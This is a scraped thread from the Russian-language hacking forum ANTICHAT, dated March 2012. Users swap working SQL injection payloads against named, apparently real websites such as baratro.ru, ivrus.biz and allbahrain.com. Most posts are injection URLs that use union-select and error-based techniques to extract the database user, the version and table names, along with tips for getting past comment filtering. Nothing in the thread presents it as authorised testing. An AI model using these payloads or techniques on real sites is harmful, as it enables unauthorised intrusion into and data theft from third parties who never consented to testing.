ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
25.03.2012, 18:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от qaz
qaz said:
ок, а тут как?
http://baratro.ru/subcat.php?id=22'
таже самая проблема
Там легко же... =\
|
|
|
|
25.03.2012, 18:27
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Друзья! Не забываем про внимательность и настойчивось.
ПРОФИТ:
http://www.ivrus.biz/showphoto.php?fid=6&pid=4&id=-1+union+select+1,2,3,user(),5,6,7--+
А вообще вот так:
http://www.ivrus.biz/showcat.php?id=7+union+select+1,2,3+from+mysql.use r--+
можно понять что пользователь mysql имеет какие-то более-менее значимые привилегии в данном случае 'в слепую'.
|
|
|
25.03.2012, 18:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
35174
Репутация:
-6
|
|
I need help on this one.
Код:
Code:
http://allbahrain.com/list_resturant_menu.php?resturant=1
Tried so many synthax, maybe it's tricky. |
|
|
|
25.03.2012, 18:55
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от lightangel
lightangel said:
I need help on this one.
Код:
Code:
http://allbahrain.com/list_resturant_menu.php?resturant=1
Tried so many synthax, maybe it's tricky. http://allbahrain.com/list_resturant_menu.php?resturant=1+and+substring( version(),1,1)=5--+f
|
|
|
|
25.03.2012, 19:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от Cennarios
Cennarios said:
Друзья! Не забываем про внимательность и настойчивось.
ПРОФИТ:
http://www.ivrus.biz/showphoto.php?fid=6&pid=4&id=-1+union+select+1,2,3,user(),5,6,7--+
хм.. действительно
Сообщение от Ereee
Ereee said:
Там легко же... =\
так не
http://baratro.ru/subcat.php?id=22%27+and%28select+1+from%28select+c ount%28*%29,concat%28%28select+table_name+from+inf ormation_schema.tables+limit+0,1%29,0x00,floor%28r and%280%29*2%29%29x+from+information_schema.tables +group+by+x%29a%29--+
так тоже
http://baratro.ru/subcat.php?id=22%27+or+1+group+by+concat%28%28sele ct+version%28%29%29,0x00,floor%28rand%280%29*2%29% 29having+min%280%29+or+1--+
о, так пашет
http://baratro.ru/subcat.php?id=22'+or+(@:=1)||@+group+by+concat((se lect+version()),@:=@-1)having+@||min(@:=0)--+f
блин, чёт не пойму, @:=1 там между собакой и двоеточием должно быть имя переменной которой присваиваем еденицу, как ето конструкция ваще ваызывает вывоод?
|
|
|
|
25.03.2012, 19:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от qaz
qaz said:
блин, чёт не пойму, @:=1 там между собакой и двоеточием должно быть имя переменной которой присваиваем еденицу, как ето конструкция ваще ваызывает вывоод?
Ну так ты вначале переменную определяешь, как можно применять различные операции на неизвестно что.
|
|
|
|
25.03.2012, 19:24
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от Ereee
Ereee said:
Ну так ты вначале переменную определяешь, как можно применять различные операции на неизвестно что.
никак, ет типа получается ещо один вид выода чарез ошибку?
|
|
|
|
26.03.2012, 04:04
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от qaz
qaz said:
хм.. действительно
так не
http://baratro.ru/subcat.php?id=22%27+and%28select+1+from%28select+c ount%28*%29,concat%28%28select+table_name+from+inf ormation_schema.tables+limit+0,1%29,0x00,floor%28r and%280%29*2%29%29x+from+information_schema.tables +group+by+x%29a%29--+
так тоже
http://baratro.ru/subcat.php?id=22%27+or+1+group+by+concat%28%28sele ct+version%28%29%29,0x00,floor%28rand%280%29*2%29% 29having+min%280%29+or+1--+
о, так пашет
http://baratro.ru/subcat.php?id=22'+or+(@:=1)||@+group+by+concat((se lect+version()),@:=@-1)having+@||min(@:=0)--+f
блин, чёт не пойму, @:=1 там между собакой и двоеточием должно быть имя переменной которой присваиваем еденицу, как ето конструкция ваще ваызывает вывоод?
Зачем использование переменных?
Вот все выводит:
http://baratro.ru//subcat.php?id=22'or(1)+group+by+concat(version(),f loor(rand(0)*2))having(min(0))or(1)and'
Твой запрос не работает из-за комментария:
http://baratro.ru/subcat.php?id=22'and(select+1+from(select+count(*) ,concat((select+concat(version(),0x3a)+from+inform ation_schema.tables+limit+0,1),floor(rand(0)*2))x+ from+information_schema.tables+group+by+x)a)and'
Вместо and', тот, что на конце можно использовать 100500 вариантов:
-- a
and'
and'1'='1
%23
И т.д...
|
|
|
|
27.03.2012, 21:28
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Привет
Подскажите как раскрутить скулю если я не могу оборвать запрос стандартными --+
+ так и выводится в ошибке как плюс
Пробовал /**/ - режется
%09...%20 и т.д. так-же выводятся в ошибке как есть
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]SELECT[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]FROM users WHERE link[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'admin'[/COLOR][COLOR="#007700"]--+[/COLOR][COLOR="#DD0000"]'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''[/COLOR][COLOR="#0000BB"]at line 1[/COLOR][/COLOR]
|
|
|
|
27.03.2012, 21:33
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Попробуй:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]SELECT[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]FROM users WHERE link[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'admin'[/COLOR][COLOR="#007700"]and[/COLOR][COLOR="#DD0000"]'1'[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'1[/COLOR][/COLOR]
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
